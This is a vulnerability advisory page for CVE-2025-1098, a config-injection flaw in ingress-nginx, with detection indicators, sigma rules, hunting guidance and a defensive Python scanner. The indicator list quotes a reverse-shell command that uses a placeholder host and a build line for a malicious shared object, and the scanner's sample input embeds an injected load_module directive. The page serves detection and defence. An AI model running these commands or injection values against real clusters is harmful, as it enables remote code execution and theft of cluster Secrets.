CVE-2025-1098
published 2025-03-25


Priority: P2 (77), high
CVSS 3.1: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Exploit: available
EPSS: 83.07% (99.6th percentile)
A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `mirror-target` and `mirror-host` Ingress annotations can be used to inject arbitrary configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)

Affected (5 ranges)

Vendor     | Product                  | Version range                | Fixed in
k8s.io     | ingress-nginx            | >= 0, < 1.11.5               | 1.11.5
k8s.io     | ingress-nginx            | >= 1.12.0-beta.0, < 1.12.1   | 1.12.1
kubernetes | ingress-nginx            | <= 1.11.4                    |
kubernetes | ingress-nginx            |                              |
msrc       | azure_kubernetes_service |                              |

Detection & IOCs (extracted from sources)

port: 8443
command: gcc -fPIC -Wall -shared -o evil_engine.so evil_engine.c -lcrypto
command: bash -c 'bash -i >& /dev/tcp/HOST/PORT 0>&1'
filename: evil_engine.so
filename: evil_engine.c
path: /proc/{proc}/fd/{fd}
url: /admission
ua: qmx-ingress-exploiter
other: nginx.ingress.kubernetes.io/mirror-target
other: load_module test
sigma: event.type = 'Behavioral Indicators' and (k8sCluster.namespace='ingress-nginx' or k8sCluster.containerImage contains 'ingress-nginx/controller')
sigma: (k8sCluster.namespace='ingress-nginx' or k8sCluster.containerImage contains 'ingress-nginx/controller') event.type = 'IP Connect' event.network.direction='OUTGOING'
sigma: dataSource.name = 'SentinelOne' and endpoint.os = 'linux' and tgt.process.name = 'nginx' and tgt.process.cmdline contains 'nginx-cfg' and tgt.process.cmdline contains ' -t'
  • Monitor for unauthenticated POST requests carrying AdmissionReview JSON bodies sent directly to the admission controller endpoint (port 8443) from pods within the cluster, bypassing the Kubernetes API server.
  • Alert on nginx process invocations with both 'nginx-cfg' and '-t' in the command line, which indicates the configuration validation step being triggered — the point of exploitation.
  • Detect anomalous outbound IP connections originating from the ingress-nginx namespace or containers, which may indicate post-exploitation reverse shell or data exfiltration activity.
  • Detect injection attempts by looking for AdmissionReview requests where the metadata UID field contains newline characters or nginx directives such as 'load_module'.
  • Flag AdmissionReview responses containing both 'AdmissionReview' and 'load_module' alongside the error string 'directive is specified too late', which confirms successful config injection.
  • Hunt for the User-Agent string 'qmx-ingress-exploiter' in HTTP logs, which is used by the public exploit to upload the malicious shared object to the ingress endpoint.
  • Detect creation or loading of shared object files (*.so) from unexpected paths within the ingress-nginx controller pod, particularly files named 'evil_engine.so' or loaded via /proc/PID/fd/ paths.
  • Use Shodan or equivalent internet-scanning tools to identify exposed ingress-nginx admission controllers by querying for SSL certificate containing 'ingress-nginx' on port 8443.
  • Monitor for the presence of the 'nginx.ingress.kubernetes.io/mirror-target' or 'nginx.ingress.kubernetes.io/mirror-host' annotations in ingress objects submitted to the admission controller, especially with values containing special characters or newlines.
  • By default, the ingress-nginx admission controller is accessible over the network without authentication, making it reachable from any pod in the cluster without credentials.
  • In the default installation, the ingress-nginx controller runs with a Kubernetes role that grants access to all Secrets cluster-wide, maximizing the blast radius of exploitation.
  • Disabling the admission webhook (controller.admissionWebhooks.enabled=false) is a temporary mitigation but removes important safeguards for Ingress configurations; it must be re-enabled after patching.
  • The exploit brute-forces /proc/PID/fd/ file descriptors to locate the uploaded malicious shared object in memory, meaning the attack does not require writing to disk in a persistent manner.
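The two detection bullets about annotation values and AdmissionReview UIDs can be implemented as a small scanner. The following is an added example for this page, not code from the CVE record or from the ingress-nginx project: it inspects the `mirror-target` / `mirror-host` annotations of an Ingress object and the `request.uid` of an AdmissionReview body for characters that would break out of the rendered nginx directive (newline, `;`, `{`, `}`, `#`) and for directive names such as `load_module`. The directive list and the sample documents are constructed for the example.

```python
"""Scanner for CVE-2025-1098 style config-injection indicators.

Added example, not part of the CVE record or of ingress-nginx. It flags
values that ingress-nginx would have copied into the rendered nginx config
before the fix: mirror-* annotation values and the AdmissionReview UID.
"""
import json
import re

MIRROR_ANNOTATIONS = (
    "nginx.ingress.kubernetes.io/mirror-target",
    "nginx.ingress.kubernetes.io/mirror-host",
)

# Characters that end or open an nginx directive/block, or start a comment.
CONFIG_BREAK_RE = re.compile(r"[\r\n;{}#]")
# Directive names worth flagging inside a value (constructed list for this example).
DIRECTIVE_RE = re.compile(r"\b(load_module|ssl_engine|proxy_pass|lua_[a-z_]+)\b")


def suspicious_value(value):
    """Return the reasons a string looks like nginx config injection ([] if clean)."""
    reasons = []
    if CONFIG_BREAK_RE.search(value):
        reasons.append("config-break-char")
    m = DIRECTIVE_RE.search(value)
    if m:
        reasons.append("directive:" + m.group(1))
    return reasons


def scan_ingress(ingress):
    """Return findings for the mirror-* annotations of one Ingress object (a dict)."""
    findings = []
    annotations = ingress.get("metadata", {}).get("annotations", {}) or {}
    for key in MIRROR_ANNOTATIONS:
        if key in annotations:
            reasons = suspicious_value(str(annotations[key]))
            if reasons:
                findings.append({"field": "annotation:" + key, "reasons": reasons})
    return findings


def scan_admission_review(body):
    """Return findings for an AdmissionReview document (JSON string or dict).

    The request UID is checked first, then the embedded Ingress object.
    """
    doc = json.loads(body) if isinstance(body, str) else body
    request = doc.get("request", {}) or {}
    findings = []
    reasons = suspicious_value(str(request.get("uid", "")))
    if reasons:
        findings.append({"field": "request.uid", "reasons": reasons})
    findings.extend(scan_ingress(request.get("object") or {}))
    return findings


# Constructed sample input: a benign Ingress using the mirror feature normally.
BENIGN_INGRESS = {
    "metadata": {
        "name": "web",
        "annotations": {"nginx.ingress.kubernetes.io/mirror-target": "/mirror"},
    }
}

# Constructed sample input: an AdmissionReview whose UID and mirror-host value
# both carry newline-separated content, the pattern the detection bullets describe.
MALICIOUS_REVIEW = json.dumps({
    "kind": "AdmissionReview",
    "apiVersion": "admission.k8s.io/v1",
    "request": {
        "uid": "9c3e\nload_module modules/x.so;\n",
        "object": {
            "metadata": {
                "name": "web",
                "annotations": {
                    "nginx.ingress.kubernetes.io/mirror-host": "example.test;\n# injected"
                },
            }
        },
    },
})

if __name__ == "__main__":
    print("benign:", scan_ingress(BENIGN_INGRESS))
    for finding in scan_admission_review(MALICIOUS_REVIEW):
        print("finding:", finding)
```

Run it against AdmissionReview bodies captured from the webhook (or Ingress manifests from an audit log); any finding on an unpatched cluster is worth an alert, and on a patched one it still identifies who is sending malformed objects.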

CVSS provenance

nvd (v3.1): 8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vendor_msrc: 8.8 HIGH
vendor_redhat: 8.8 HIGH